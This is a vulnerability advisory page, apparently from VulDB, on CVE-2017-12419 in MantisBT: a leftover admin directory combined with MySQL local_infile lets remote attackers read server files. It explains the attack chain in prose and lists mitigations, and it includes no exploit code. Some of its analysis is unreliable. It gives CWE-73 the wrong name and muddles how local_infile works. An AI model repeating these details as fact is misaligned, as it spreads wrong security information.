CVE-2017-12419 in MantisBT
Summary
by MITRE
If, after successful installation of MantisBT through 2.5.2 on MySQL/MariaDB, the administrator does not remove the 'admin' directory (as recommended in the "Post-installation and upgrade tasks" section of the MantisBT Admin Guide), and the MySQL client has a local_infile setting enabled (in php.ini mysqli.allow_local_infile, or the MySQL client config file, depending on the PHP setup), an attacker may take advantage of MySQL's "connect file read" feature to remotely access files on the MantisBT server.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 01/07/2021
This vulnerability exists in MantisBT versions 2.5.2 and earlier where the installation process does not properly enforce security best practices for file system permissions and database configurations. The flaw arises when administrators fail to remove the default admin directory as explicitly recommended in the official administration guide, creating a persistent attack surface that remains accessible to unauthorized users. The vulnerability is particularly dangerous because it combines multiple security misconfigurations into a single attack vector that can be exploited by remote attackers without authentication.
The technical exploitation mechanism relies on MySQL's local_infile functionality, which allows the database client to read local files directly from the server's file system. When the MySQL client has mysqli.allow_local_infile enabled in php.ini or through MySQL configuration files, attackers can leverage this feature to read arbitrary files on the server where MantisBT is installed. This occurs because the application's database connections can be manipulated to utilize MySQL's file reading capabilities, effectively bypassing normal file system access controls. The attack chain begins with the attacker accessing the exposed admin directory, then leveraging database connection parameters to execute malicious SQL commands that reference local files on the server.
The operational impact of this vulnerability is severe as it allows remote attackers to access sensitive files on the MantisBT server including configuration files, database credentials, application source code, and potentially system files. Attackers can extract database connection strings, application secrets, and other sensitive information that could lead to further compromise of the system. The vulnerability affects the entire MantisBT installation since the default admin directory remains accessible, and the MySQL configuration settings are typically enabled by default in many production environments. This creates a persistent threat that can be exploited by anyone with access to the web application, making it particularly dangerous for organizations that fail to properly secure their installations.
Security mitigations for this vulnerability include immediate removal of the admin directory after installation, proper configuration of MySQL client settings to disable local_infile functionality, and implementation of proper access controls for the web application. Organizations should ensure that the mysqli.allow_local_infile directive is set to off in php.ini files and that MySQL client configurations do not enable file reading capabilities unnecessarily. Additionally, implementing proper network segmentation, firewall rules, and regular security audits can help prevent exploitation of this vulnerability. This vulnerability maps to CWE-22 Path Traversal and CWE-73 Improper Neutralization of Special Elements in Output Used by a Downstream Component, and aligns with ATT&CK techniques including T1078 Valid Accounts and T1005 Data from Local System. The recommended remediation strategy involves comprehensive security hardening of both the application and database configurations, along with regular security assessments to identify and address similar misconfigurations that could create similar attack vectors.